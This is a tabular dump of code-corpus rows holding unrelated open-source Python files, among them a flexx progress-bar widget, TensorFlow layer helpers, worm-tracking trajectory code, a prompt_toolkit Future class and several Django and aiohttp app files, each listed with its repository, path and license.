code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
""" ProgressBar
Example:
.. UIExample:: 100
from flexx import app, event, ui
class Example(ui.Widget):
def init(self):
with ui.HBox():
self.b1 = ui.Button(flex=0, text='Less')
self.b2 = ui.Button(flex=0, text='More')
self.prog = ui.ProgressBar(flex=1, value=0.1, text='{percent} done')
@event.reaction('b1.pointer_down', 'b2.pointer_down')
def _change_progress(self, *events):
for ev in events:
if ev.source is self.b1:
self.prog.set_value(self.prog.value - 0.1)
else:
self.prog.set_value(self.prog.value + 0.1)
"""
from ... import event
from .._widget import Widget, create_element
class ProgressBar(Widget):
""" A widget to show progress.
The ``node`` of this widget is a
`<div> <https://developer.mozilla.org/docs/Web/HTML/Element/div>`_
containing a few HTML elements for rendering.
"""
DEFAULT_MIN_SIZE = 40, 16
CSS = """
.flx-ProgressBar {
border: 1px solid #ddd;
border-radius: 6px;
background: #eee;
}
.flx-ProgressBar > .progress-bar {
/* Use flexbox to vertically align label text */
display: -webkit-flex;
display: -ms-flexbox;
display: -ms-flex;
display: -moz-flex;
display: flex;
-webkit-flex-flow: column;
-ms-flex-flow: column;
-moz-flex-flow: column;
flex-flow: column;
-webkit-justify-content: center;
-ms-justify-content: center;
-moz-justify-content: center;
justify-content: center;
white-space: nowrap;
align-self: stretch;
position: absolute; /* need this on Chrome when in a VBox */
background: #8be;
text-align: center;
/*transition: width 0.2s ease; behaves silly on Chrome */
}
"""
value = event.FloatProp(0, settable=True, doc="""
The progress value.
""")
min = event.FloatProp(0, settable=True, doc="""
The minimum progress value.
""")
max = event.FloatProp(1, settable=True, doc="""
The maximum progress value.
""")
text = event.StringProp('', settable=True, doc="""
The label to display on the progress bar. Occurances of
"{percent}" are replaced with the current percentage, and
"{value}" with the current value.
""")
@event.action
def set_value(self, value):
value = max(self.min, value)
value = min(self.max, value)
self._mutate_value(value)
@event.reaction('min', 'max')
def __keep_value_constrained(self, *events):
self.set_value(self.value)
def _render_dom(self):
global Math
value = self.value
mi, ma = self.min, self.max
perc = 100 * (value - mi) / (ma - mi)
label = self.text
label = label.replace('{value}', str(value))
label = label.replace('{percent}', Math.round(perc) + '%')
attr = {'style__width': perc+'%',
'style__height': '100%',
'className': 'progress-bar',
}
return [create_element('div', attr, label)]
| zoofIO/flexx | flexx/ui/widgets/_progressbar.py | Python | bsd-2-clause | 3,268 |
import tensorflow as tf
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W, padding='SAME'):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding=padding)
def max_pool1d(x, poolsize=2):
return tf.nn.max_pool(x, ksize=[1, poolsize, 1, 1],
strides=[1, poolsize, 1, 1], padding='SAME')
def add_cnn_layer(input, n_inputs, n_outputs, kernel_size, padding='SAME'):
#w = weight_variable([n_inputs, n_outputs])
#b = bias_variable([n_outputs])
W = weight_variable([kernel_size, 1, n_inputs, n_outputs])
b = bias_variable([n_outputs])
# Hidden layer with RELU activation
#new_layer = tf.nn.relu(tf.add(tf.matmul(input, w), b))
h_conv = tf.nn.relu(conv2d(input, W, padding=padding) + b)
# Add dropout regularization
#new_layer_with_dropout = tf.nn.dropout(new_layer, keep_prob)
h_pool = max_pool1d(h_conv)
return h_pool, W
def add_fully_connected_layer(_X, n_inputs, n_outputs, keep_prob):
W = weight_variable([n_inputs, n_outputs])
b = bias_variable([n_outputs])
# Hidden layer with RELU activation
new_layer = tf.nn.relu(tf.add(tf.matmul(_X, W), b))
# Add dropout regularization
new_layer_with_dropout = tf.nn.dropout(new_layer, keep_prob)
return new_layer_with_dropout, W
# this is my exemplary convolutional network
def cnn(_X, n_classes, keep_prob):
# two convolutional layers
layer_1, _ = add_cnn_layer(_X, 1, 32, 3, padding='VALID')
layer_2, _ = add_cnn_layer(layer_1, 32, 32, 2, padding='VALID')
# flatten last one to be able to apply it to fully connected layer
final_number_of_dimensions = 1*32
layer_2_flat = tf.reshape(layer_2, [-1, final_number_of_dimensions])
# fully connected layer to bring information together
fc_dim = 5
h_fc1_drop, _ = add_fully_connected_layer(layer_2_flat,
final_number_of_dimensions,
fc_dim, keep_prob)
# return linear output layer
W_fc2 = weight_variable([fc_dim, n_classes])
b_fc2 = bias_variable([n_classes])
return tf.matmul(h_fc1_drop, W_fc2) + b_fc2
# and this is the simpler multilayer perceptron
def multilayer_perceptron(x, n_bands, n_hidden, n_classes, keep_prob):
flattend_input = tf.reshape(x, [-1, n_bands])
layer_1, W_1 = add_fully_connected_layer(flattend_input, n_bands, n_hidden,
keep_prob)
layer_2, W_2 = add_fully_connected_layer(layer_1, n_hidden, n_hidden,
keep_prob)
last_hidden_layer, W_3 = add_fully_connected_layer(layer_2, n_hidden, n_hidden,
keep_prob)
W_out = weight_variable([n_hidden, n_classes])
b_out = bias_variable([n_classes])
regularizers = (tf.nn.l2_loss(W_1) + tf.nn.l2_loss(W_2) +
tf.nn.l2_loss(W_3) + tf.nn.l2_loss(W_out))
return tf.matmul(last_hidden_layer, W_out) + b_out, regularizers
| iwegner/MITK | Modules/Biophotonics/python/iMC/regression/tensorflow_estimator.py | Python | bsd-3-clause | 3,199 |
# Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
"""PyCrypto RC4 implementation."""
from .cryptomath import *
from .rc4 import *
if pycryptoLoaded:
import Crypto.Cipher.ARC4
def new(key):
return PyCrypto_RC4(key)
class PyCrypto_RC4(RC4):
def __init__(self, key):
RC4.__init__(self, key, "pycrypto")
key = bytesToString(key)
self.context = Crypto.Cipher.ARC4.new(key)
def encrypt(self, plaintext):
plaintext = bytesToString(plaintext)
return stringToBytes(self.context.encrypt(plaintext))
def decrypt(self, ciphertext):
ciphertext = bytesToString(ciphertext)
return stringToBytes(self.context.decrypt(ciphertext)) | martinez-zea/tts | tlslite/utils/pycrypto_rc4.py | Python | gpl-3.0 | 796 |
import os
from setuptools import find_packages, setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
install_requires = [
'requests==2.8.1'
]
setup(
name='linkedin-auth',
version='0.1',
packages=find_packages(),
include_package_data=True,
license='BSD License', # example license
description='A simple Django app for linkedin authentcation.',
long_description=README,
url='https://github.com/technoarch-softwares/linkedin-auth',
author='Pankul Mittal',
author_email='mittal.pankul@gmail.com',
install_requires = install_requires,
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.8', # replace "X.Y" as appropriate
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
zip_safe=False,
)
| technoarch-softwares/linkedin-auth | setup.py | Python | bsd-2-clause | 1,410 |
# Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
#This case corresponds to: /visu/animation/D6 case
#%Create animation for Iso Surfaces for 'pression' field of the the given MED file and dumps picture files in JPEG format %
import sys
import os
from paravistest import *
from presentations import *
from pvsimple import *
import pvserver as paravis
#import file
myParavis = paravis.myParavis
# Directory for saving snapshots
picturedir = get_picture_dir("Animation/D6")
theFileName = datadir + "TimeStamps.med"
print " --------------------------------- "
print "file ", theFileName
print " --------------------------------- "
OpenDataFile(theFileName)
aProxy = GetActiveSource()
if aProxy is None:
raise RuntimeError, "Error: can't import file."
else: print "OK"
print "Creating a Viewer.........................",
aView = GetRenderView()
reset_view(aView)
Render(aView)
if aView is None : print "Error"
else : print "OK"
# Iso Surfaces creation
prs= IsoSurfacesOnField(aProxy,EntityType.CELL,'pression', 2)
prs.Visibility=1
aView.ResetCamera()
print "Creating an Animation.....................",
my_format = "jpeg"
print "Current format to save snapshots: ",my_format
# Add path separator to the end of picture path if necessery
if not picturedir.endswith(os.sep):
picturedir += os.sep
# Select only the current field:
aProxy.AllArrays = []
aProxy.UpdatePipeline()
aProxy.AllArrays = ['TS0/dom/ComSup0/pression@@][@@P0']
aProxy.UpdatePipeline()
# Animation creation and saving into set of files into picturedir
scene = AnimateReader(aProxy,aView,picturedir+"D6_dom."+my_format)
nb_frames = len(scene.TimeKeeper.TimestepValues)
pics = os.listdir(picturedir)
if len(pics) != nb_frames:
print "FAILED!!! Number of made pictures is equal to ", len(pics), " instead of ", nb_frames
for pic in pics:
os.remove(picturedir+pic)
# Prepare animation performance
scene.PlayMode = 1 # set RealTime mode for animation performance
# set period
scene.Duration = 30 # correspond to set the speed of animation in VISU
scene.GoToFirst()
print "Animation.................................",
scene.Play()
scene.GoToFirst()
| FedoraScientific/salome-paravis | test/VisuPrs/Animation/D6.py | Python | lgpl-2.1 | 2,961 |
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 2 16:33:34 2015
@author: ajaver
"""
import os
import numpy as np
import pandas as pd
import tables
from scipy.spatial.distance import cdist
from tierpsy.helper.misc import TimeCounter, print_flush, TABLE_FILTERS
def assignBlobTraj(trajectories_file, max_allowed_dist=20, area_ratio_lim=(0.5, 2)):
#loop, save data and display progress
base_name = os.path.basename(trajectories_file).replace('_trajectories.hdf5', '').replace('_skeletons.hdf5', '')
with pd.HDFStore(trajectories_file, 'r') as fid:
plate_worms = fid['/plate_worms']
traj_ind = assignBlobTrajDF(plate_worms, max_allowed_dist, area_ratio_lim, base_name=base_name)
if traj_ind is not None:
with tables.File(trajectories_file, 'r+') as fid:
tbl = fid.get_node('/', 'plate_worms')
tbl.modify_column(column=traj_ind, colname='worm_index_blob')
#print_flush(progress_time.get_str(frame))
def assignBlobTrajDF(traj_df, max_allowed_dist, area_ratio_lim, base_name=''):
def _get_cost_matrix(frame_data, frame_data_prev):
coord = frame_data[['coord_x', 'coord_y']].values
coord_prev = frame_data_prev[['coord_x', 'coord_y']].values
costMatrix = cdist(coord_prev, coord) # calculate the cost matrix
# assign a large value to non-valid combinations by area
area = frame_data['area'].values
area_prev = frame_data_prev['area'].values
area_ratio = area_prev[:, None]/area[None,:]
area_ratio[np.isnan(area_ratio)] = 1e20
bad_ratio = (area_ratio<area_ratio_lim[0]) | \
(area_ratio>area_ratio_lim[1]) | \
np.isnan(costMatrix)
costMatrix[bad_ratio] = 1e20
return costMatrix
def _get_prev_ind_match(costMatrix):
def _label_bad_ind(indexes, dist, max_allowed_dist):
#label as bad the pairs that have a distance larger than max_allowed_dist
indexes[dist>max_allowed_dist] = -1
#remove indexes that where assigned twice (either a merge or a split event)
uind, counts = np.unique(indexes, return_counts=True)
duplicated_ind = uind[counts>1]
bad_ind = np.in1d(indexes, duplicated_ind)
indexes[bad_ind] = -1
return indexes
#I get the corresponding index in the previous data_frame
#I remove pairs located at positions larger than max_allowed_dist
#And indexes that where assigned twice or more (split events)
map_to_prev = np.argmin(costMatrix, axis=0) #must have dimensions of frame_data
min_dist_pp = costMatrix[map_to_prev, np.arange(costMatrix.shape[1])]
_label_bad_ind(map_to_prev, min_dist_pp, max_allowed_dist)
#here i am looking at in the prev indexes that would have been
#assigned twice or more to the next indexes (merge events)
map_to_next = np.argmin(costMatrix, axis=1) #must have dimensions of frame_data_prev
min_dist_pp = costMatrix[np.arange(costMatrix.shape[0]), map_to_next]
_label_bad_ind(map_to_next, min_dist_pp, max_allowed_dist)
bad_prev_ind = np.where(map_to_next==-1)[0] #techincally either index too far away or duplicated
possible_merges = np.in1d(map_to_prev, bad_prev_ind)
map_to_prev[possible_merges] = -1
return map_to_prev
frame_data_prev = None
tot_worms = 0
all_indexes = []
frames_grouped = traj_df.groupby('frame_number')
#if isinstance(area_ratio_lim, (float, int)):
# area_ratio_lim = (1/area_ratio_lim, area_ratio_lim)
progress_time = TimeCounter(base_name + ' Assigning trajectories.', len(frames_grouped))
for frame, frame_data in frames_grouped:
#what happens if the frames are not continous?
if frame_data_prev is not None:
_, prev_traj_ind = all_indexes[-1]
costMatrix = _get_cost_matrix(frame_data, frame_data_prev)
map_to_prev = _get_prev_ind_match(costMatrix)
traj_indexes = np.zeros_like(map_to_prev)
unmatched = map_to_prev == -1
matched = ~unmatched
#assign matched index from the previous indexes
traj_indexes[matched] = prev_traj_ind[map_to_prev[matched]]
vv = np.arange(1, np.sum(unmatched) + 1) + tot_worms
if vv.size > 0:
tot_worms = vv[-1]
traj_indexes[unmatched] = vv
else:
# initialize worm indexes
traj_indexes = tot_worms + np.arange(1, len(frame_data) + 1)
tot_worms = traj_indexes[-1]
all_indexes.append((frame_data.index, traj_indexes))
frame_data_prev = frame_data
if frame % 500 == 0:
# calculate the progress and put it in a string
print_flush(progress_time.get_str(frame))
if all_indexes:
row_ind, traj_ind = map(np.concatenate, zip(*all_indexes))
traj_ind = traj_ind[np.argsort(row_ind)]
return traj_ind
def _validRowsByArea(plate_worms):
# here I am assuming that most of the time the largest area in the frame is a worm. Therefore a very large area is likely to be
# noise
groupsbyframe = plate_worms.groupby('frame_number')
maxAreaPerFrame = groupsbyframe.agg({'area': 'max'})
med_area = np.median(maxAreaPerFrame)
mad_area = np.median(np.abs(maxAreaPerFrame - med_area))
min_area = med_area - mad_area * 6
max_area = med_area + mad_area * 6
groupByIndex = plate_worms.groupby('worm_index_blob')
median_area_by_index = groupByIndex.agg({'area': np.median})
good = ((median_area_by_index > min_area) & (
median_area_by_index < max_area)).values
valid_ind = median_area_by_index[good].index
plate_worms_f = plate_worms[plate_worms['worm_index_blob'].isin(valid_ind)]
# median location, it is likely the worm spend more time here since the
# stage movements tries to get it in the centre of the frame
CMx_med = plate_worms_f['coord_x'].median()
CMy_med = plate_worms_f['coord_y'].median()
L_med = plate_worms_f['box_length'].median()
# let's use a threshold of movement of at most a quarter of the worm size,
# otherwise we discard frame.
L_th = L_med / 4
# now if there are still a lot of valid blobs we decide by choising the
# closest blob
valid_rows = []
tot_frames = plate_worms['frame_number'].max() + 1
def get_valid_indexes(frame_number, prev_row):
try:
current_group_f = groupbyframe_f.get_group(frame_number)
except KeyError:
# there are not valid index in the current group
prev_row = -1
return prev_row
# pick the closest blob if there are more than one blob to pick
if not isinstance(prev_row, int):
delX = current_group_f['coord_x'] - prev_row['coord_x']
delY = current_group_f['coord_y'] - prev_row['coord_y']
else:
delX = current_group_f['coord_x'] - CMx_med
delY = current_group_f['coord_y'] - CMy_med
R = np.sqrt(delX * delX + delY * delY)
good_ind = np.argmin(R)
if R[good_ind] < L_th:
prev_row = current_group_f.loc[good_ind]
valid_rows.append(good_ind)
else:
prev_row = -1
return prev_row
# group by frame
groupbyframe_f = plate_worms_f.groupby('frame_number')
prev_row = -1
first_frame = tot_frames
for frame_number in range(tot_frames):
prev_row = get_valid_indexes(frame_number, prev_row)
if not isinstance(prev_row, int) and first_frame > frame_number:
first_frame = frame_number
# if the first_frame is larger than zero it means that it might have lost some data in from the begining
# let's try to search again from opposite direction
if frame_number > 0 and len(valid_rows) > 0:
prev_row = plate_worms_f.loc[np.min(valid_rows)]
for frame_number in range(frame_number, -1, -1):
prev_row = get_valid_indexes(frame_number, prev_row)
#valid_rows = list(set(valid_rows))
return valid_rows
def correctSingleWormCase(trajectories_file):
'''
Only keep the object with the largest area when cosider the case of individual worms.
'''
with pd.HDFStore(trajectories_file, 'r') as traj_fid:
plate_worms = traj_fid['/plate_worms']
# emtpy table nothing to do here
if len(plate_worms) == 0:
return
valid_rows = _validRowsByArea(plate_worms)
# np.array(1, dtype=np.int32)
plate_worms['worm_index_joined'] = np.array(-1, dtype=np.int32)
plate_worms.loc[valid_rows, 'worm_index_joined'] = 1
with tables.File(trajectories_file, "r+") as traj_fid:
newT = traj_fid.create_table('/', 'plate_worms_t',
obj=plate_worms.to_records(index=False),
filters=TABLE_FILTERS)
newT._v_attrs['has_finished'] = 2
traj_fid.remove_node('/', 'plate_worms')
newT.rename('plate_worms')
def joinGapsTrajectories(trajectories_file,
min_track_size=50,
max_time_gap=100,
area_ratio_lim=(0.67, 1.5)):
#% get the first and last rows for each trajectory. Pandas is easier of manipulate than tables.
with pd.HDFStore(trajectories_file, 'r') as fid:
df = fid['plate_worms'][['worm_index_blob', 'frame_number',
'coord_x', 'coord_y', 'area', 'box_length']]
worm_index_joined = joinGapsTrajectoriesDF(df,
min_track_size=min_track_size,
max_time_gap=max_time_gap,
area_ratio_lim=area_ratio_lim
)
# update worm_index_joined field
with tables.open_file(trajectories_file, mode='r+') as fid:
plate_worms = fid.get_node('/plate_worms')
# add the result the column worm_index_joined
plate_worms.modify_column(
colname='worm_index_joined',
column=worm_index_joined)
fid.flush()
def joinGapsTrajectoriesDF(plate_worms,
min_track_size=50,
max_time_gap=100,
area_ratio_lim=(0.67, 1.5),
worm_index_type='worm_index_blob'):
'''
area_ratio_lim -- allowed range between the area ratio of consecutive frames
min_track_size -- minimum tracksize accepted
max_time_gap -- time gap between joined trajectories
'''
def _findNextTraj(df,
area_ratio_lim,
min_track_size,
max_time_gap):
'''
area_ratio_lim -- allowed range between the area ratio of consecutive frames
min_track_size -- minimum tracksize accepted
max_time_gap -- time gap between joined trajectories
'''
df = df[[worm_index_type, 'frame_number',
'coord_x', 'coord_y', 'area', 'box_length']].dropna()
# select the first and last frame_number for each separate trajectory
tracks_data = df[[worm_index_type, 'frame_number']]
tracks_data = tracks_data.groupby(worm_index_type)
tracks_data = tracks_data.aggregate(
{'frame_number': [np.argmin, np.argmax, 'count']})
# filter data only to include trajectories larger than min_track_size
tracks_data = tracks_data[
tracks_data['frame_number']['count'] >= min_track_size]
valid_indexes = tracks_data.index
# select the corresponding first and last rows of each trajectory
first_rows = df.ix[tracks_data['frame_number']['argmin'].values]
last_rows = df.ix[tracks_data['frame_number']['argmax'].values]
# let's use the particle id as index instead of the row number
last_rows.index = tracks_data['frame_number'].index
first_rows.index = tracks_data['frame_number'].index
#% look for trajectories that could be join together in a small time gap
join_frames = []
for curr_index in valid_indexes:
# the possible connected trajectories must have started after the end of the current trajectories,
# within a timegap given by max_time_gap
possible_rows = first_rows[
(first_rows['frame_number'] > last_rows['frame_number'][curr_index]) & (
first_rows['frame_number'] < last_rows['frame_number'][curr_index] +
max_time_gap)]
# the area change must be smaller than the one given by area_ratio_lim
# it is better to use the last point change of area because we are
# considered changes near that occur near time
areaR = last_rows['area'][curr_index] / possible_rows['area']
possible_rows = possible_rows[
(areaR > area_ratio_lim[0]) & (
areaR < area_ratio_lim[1])]
# not valid rows left
if len(possible_rows) == 0:
continue
R = np.sqrt((possible_rows['coord_x'] -
last_rows['coord_x'][curr_index]) ** 2 +
(possible_rows['coord_y'] -
last_rows['coord_x'][curr_index]) ** 2)
indmin = np.argmin(R)
# only join trajectories that move at most one worm body
if R[indmin] <= last_rows['box_length'][curr_index]:
#print(curr_index, indmin)
join_frames.append((indmin, curr_index))
relations_dict = dict(join_frames)
return relations_dict, valid_indexes
def _joinDict2Index(worm_index, relations_dict, valid_indexes):
worm_index_new = np.full_like(worm_index, -1)
for ind in valid_indexes:
# seach in the dictionary for the first index in the joined trajectory
# group
ind_joined = ind
while ind_joined in relations_dict:
ind_joined = relations_dict[ind_joined]
# replace the previous index for the root index
worm_index_new[worm_index == ind] = ind_joined
return worm_index_new
relations_dict, valid_indexes = _findNextTraj(plate_worms, area_ratio_lim, min_track_size, max_time_gap)
# read the worm_index_blob column, this is the index order that have to
# be conserved in the worm_index_joined column
worm_index_blob = plate_worms[worm_index_type].values
worm_index_joined = _joinDict2Index(worm_index_blob, relations_dict, valid_indexes)
return worm_index_joined
def joinBlobsTrajectories(trajectories_file,
analysis_type,
max_allowed_dist,
area_ratio_lim,
min_track_size,
max_time_gap):
#allow to recieve int/float values
if not isinstance(area_ratio_lim, (tuple,list)):
area_ratio_lim = (1/area_ratio_lim, area_ratio_lim)
assignBlobTraj(trajectories_file, max_allowed_dist, area_ratio_lim)
if analysis_type == 'WT2':
correctSingleWormCase(trajectories_file)
else:
joinGapsTrajectories(trajectories_file, min_track_size, max_time_gap, area_ratio_lim)
with tables.File(trajectories_file, "r+") as traj_fid:
traj_fid.get_node('/plate_worms')._v_attrs['has_finished'] = 2
traj_fid.flush() | ljschumacher/tierpsy-tracker | tierpsy/analysis/traj_join/joinBlobsTrajectories.py | Python | mit | 15,842 |
from sklearn2sql_heroku.tests.regression import generic as reg_gen
reg_gen.test_model("SGDRegressor" , "freidman2" , "hive")
| antoinecarme/sklearn2sql_heroku | tests/regression/freidman2/ws_freidman2_SGDRegressor_hive_code_gen.py | Python | bsd-3-clause | 127 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2016-05-05 14:32:46
# @Author : moling (365024424@qq.com)
# @Link : #
# @Version : 0.1
import logging
import os
from aiohttp import web
from jinja2 import Environment, FileSystemLoader
from config import COOKIE_NAME, COOKIE_KEY
from app.frame import add_routes, add_static
from app.frame.orm import create_pool
from app.factories import logger_factory, auth_factory, data_factory, response_factory
from app.filters import datetime_filter, marked_filter
logging.basicConfig(level=logging.INFO)
# jinja2初始化函数
def init_jinja2(app, **kw):
logging.info('init jinja2...')
options = {
'autoescape': kw.get('autoescape', True),
'block_start_string': kw.get('block_start_string', '{%'),
'block_end_string': kw.get('block_end_string', '%}'),
'variable_start_string': kw.get('variable_start_string', '{{'),
'variable_end_string': kw.get('variable_end_string', '}}'),
'auto_reload': kw.get('auto_reload', True)
}
path = kw.get('path', os.path.join(__path__[0], 'templates'))
logging.info('set jinja2 template path: %s' % path)
env = Environment(loader=FileSystemLoader(path), **options)
filters = kw.get('filters')
if filters is not None:
for name, ftr in filters.items():
env.filters[name] = ftr
app['__templating__'] = env
async def create_server(loop, config_mod_name):
try:
config = __import__(config_mod_name, fromlist=['get config'])
except ImportError as e:
raise e
await create_pool(loop, **config.db_config)
app = web.Application(loop=loop, middlewares=[
logger_factory, auth_factory, data_factory, response_factory])
add_routes(app, 'app.route')
add_routes(app, 'app.api')
add_routes(app, 'app.api_v2')
add_static(app)
init_jinja2(app, filters=dict(datetime=datetime_filter, marked=marked_filter), **config.jinja2_config)
server = await loop.create_server(app.make_handler(), '127.0.0.1', 9900)
logging.info('server started at http://127.0.0.1:9900...')
return server
| moling3650/mblog | www/app/__init__.py | Python | mit | 2,122 |
"""
Future implementation for the prompt_toolkit eventloop.
"""
from __future__ import unicode_literals, print_function
from .base import EventLoop
from .context import get_context_id, context
from .defaults import get_event_loop
import sys
__all__ = [
'Future',
'InvalidStateError',
]
class InvalidStateError(Exception):
" The operation is not allowed in this state. "
class Future(object):
"""
`Future` object for use with the prompt_toolkit event loops. (Not by
accident very similar to asyncio -- but much more limited in functionality.
They are however not meant to be used interchangeable.)
"""
def __init__(self, loop=None):
assert loop is None or isinstance(loop, EventLoop)
self.loop = loop or get_event_loop()
self.done_callbacks = []
self._result = None
self._exception = None
self._done = False
self._retrieved_result = False
# Keep track of which `TaskContext` was active when this Future was
# created. This is the one that will be viewed as visible when the
# callbacks are called. (This is required to make get_app/set_app work
# together with coroutines, when there are multiple active
# applications, attached to different outputs.)
self._ctx_id = get_context_id()
# Thanks to asyncio for the following destructor!
# On Python 3.3 and older, objects with a destructor part of a reference
# cycle are never destroyed. It's not more the case on Python 3.4 thanks
# to the PEP 442.
if sys.version_info >= (3, 4):
def __del__(self):
if self._exception and not self._retrieved_result:
exc = self._exception
context = {
'message': ('%s exception was never retrieved'
% self.__class__.__name__),
'exception': exc,
'future': self,
}
self.loop.call_exception_handler(context)
@classmethod
def succeed(cls, result):
"""
Returns a Future for which the result has been set to the given result.
Similar to Twisted's `Deferred.succeed()`.
"""
f = cls()
f.set_result(result)
return f
@classmethod
def fail(cls, result):
"""
Returns a Future for which the error has been set to the given result.
Similar to Twisted's `Deferred.fail()`.
"""
f = cls()
f.set_exception(result)
return f
def add_done_callback(self, callback):
"""
Add a callback to be run when the future becomes done. (This
callback will be called with one argument only: this future
object.)
"""
self.done_callbacks.append(callback)
# When a result has already been set. Call callback right away.
if self._done:
def call_cb():
self._retrieved_result = True
callback(self)
self.loop.call_from_executor(call_cb)
def set_result(self, result):
" Mark the future done and set its result. "
if self._done:
raise InvalidStateError('Future result has been set already.')
self._result = result
self._done = True
self._call_callbacks()
def set_exception(self, exception):
" Mark the future done and set an exception. "
if self._done:
raise InvalidStateError('Future result has been set already.')
self._exception = exception
self._done = True
if self.done_callbacks:
self._call_callbacks()
else:
# When an exception is set on a 'Future' object, but there
# is no callback set to handle it, print the exception.
# -- Uncomment for debugging. --
# import traceback, sys
# print(''.join(traceback.format_stack()), file=sys.__stderr__)
# print('Uncollected error: %r' % (exception, ), file=sys.__stderr__)
pass
def _call_callbacks(self):
# Create a local copy of the callbacks. Otherwise, it could be that
# another call to `add_done_callback` would add a new callback to this list
# which would then be called twice. (Once from here, once from the
# `add_done_callback` function directly.
done_callbacks = self.done_callbacks[:]
if done_callbacks:
self._retrieved_result = True
def call_them_all():
# Activate the original task context (and application) again.
with context(self._ctx_id):
# They should be called in order.
for cb in done_callbacks:
cb(self)
self.loop.call_from_executor(call_them_all)
def result(self):
" Return the result this future represents. "
if not self._done:
raise InvalidStateError
self._retrieved_result = True
if self._exception:
raise self._exception
else:
return self._result
def exception(self):
" Return the exception that was set on this future. "
if not self._done:
raise InvalidStateError
self._retrieved_result = True
return self._exception
def done(self):
"""
Return True if the future is done. Done means either that a result /
exception are available, or that the future was cancelled.
"""
return self._done
def to_asyncio_future(self):
"""
Turn this `Future` into an asyncio `Future` object.
"""
from asyncio import Future
asyncio_f = Future()
@self.add_done_callback
def _(f):
if f.exception():
asyncio_f.set_exception(f.exception())
else:
asyncio_f.set_result(f.result())
return asyncio_f
@classmethod
def from_asyncio_future(cls, asyncio_f, loop=None):
"""
Return a prompt_toolkit `Future` from the given asyncio Future.
"""
f = cls(loop=loop)
@asyncio_f.add_done_callback
def _(asyncio_f):
if asyncio_f.exception():
f.set_exception(asyncio_f.exception())
else:
f.set_result(asyncio_f.result())
return f
def __iter__(self):
" For compatibility with asyncio. "
return self.to_asyncio_future().__iter__()
__await__ = __iter__
| lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/eventloop/future.py | Python | mit | 6,560 |
# Generated by Django 3.1.3 on 2021-01-06 19:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("accounts", "0010_auto_20201213_1314"),
]
operations = [
migrations.AlterField(
model_name="auditlog",
name="activity",
field=models.CharField(
choices=[
("auth-connect", "auth-connect"),
("auth-disconnect", "auth-disconnect"),
("connect", "connect"),
("email", "email"),
("failed-auth", "failed-auth"),
("full_name", "full_name"),
("invited", "invited"),
("locked", "locked"),
("login", "login"),
("login-new", "login-new"),
("password", "password"),
("register", "register"),
("removed", "removed"),
("reset", "reset"),
("reset-request", "reset-request"),
("sent-email", "sent-email"),
("tos", "tos"),
("trial", "trial"),
("username", "username"),
],
db_index=True,
max_length=20,
),
),
]
| nijel/weblate | weblate/accounts/migrations/0011_auto_20210106_1903.py | Python | gpl-3.0 | 1,374 |
import json
from django.http import HttpResponse
from django.views.generic import TemplateView
class JSONResponseMixin(object):
"""
A mixin that can be used to render a JSON response.
"""
response_class = HttpResponse
def render_to_response(self, context, **response_kwargs):
"""
Returns a JSON response, transforming 'context' to make the payload.
"""
response_kwargs['content_type'] = 'application/json'
return self.response_class(
self.convert_context_to_json(context),
**response_kwargs
)
def convert_context_to_json(self, context):
"Convert the context dictionary into a JSON object"
# Note: This is *EXTREMELY* naive; in reality, you'll need
# to do much more complex handling to ensure that arbitrary
# objects -- such as Django model instances or querysets
# -- can be serialized as JSON.
return json.dumps(context)
from django.views.generic import TemplateView
class JSONView(JSONResponseMixin, TemplateView):
pass
class JSONDetailView(JSONResponseMixin, BaseDetailView):
pass
class HybridDetailView(JSONResponseMixin, SingleObjectTemplateResponseMixin, BaseDetailView):
def render_to_response(self, context):
# Look for a 'format=json' GET argument
if self.request.GET.get('format','html') == 'json':
return JSONResponseMixin.render_to_response(self, context)
else:
return SingleObjectTemplateResponseMixin.render_to_response(self, context)
| rubydhash/webradius | webradius-project/lib/djangoutils/jsonutils.py | Python | lgpl-2.1 | 1,649 |
"""
Useful constants used in this project
"""
# use for spider JSON output
NAME_KEY = 'name'
ID_KEY = 'id'
PRICE_KEY = 'price'
LINK_KEY = 'link' | wriggityWrecked/WebScraping | constants.py | Python | apache-2.0 | 145 |
from django.db import models
from django.contrib.auth.models import User
from cms.models import CMSPlugin
class ContestPlugin(CMSPlugin):
title = models.CharField(max_length=255)
class Prediction(models.Model):
user = models.ForeignKey(User)
date = models.DateTimeField(auto_now_add=True)
class Week(models.Model):
prediction = models.ForeignKey(Prediction)
number = models.IntegerField()
value = models.CharField(max_length=6, null=True)
class Meta:
ordering = ('number',)
| ISIFoundation/influenzanet-website | apps/contest/models.py | Python | agpl-3.0 | 514 |
"""Collection of bulk systems.
From this paper:
Philipp Haas, Fabien Tran, Peter Blaha
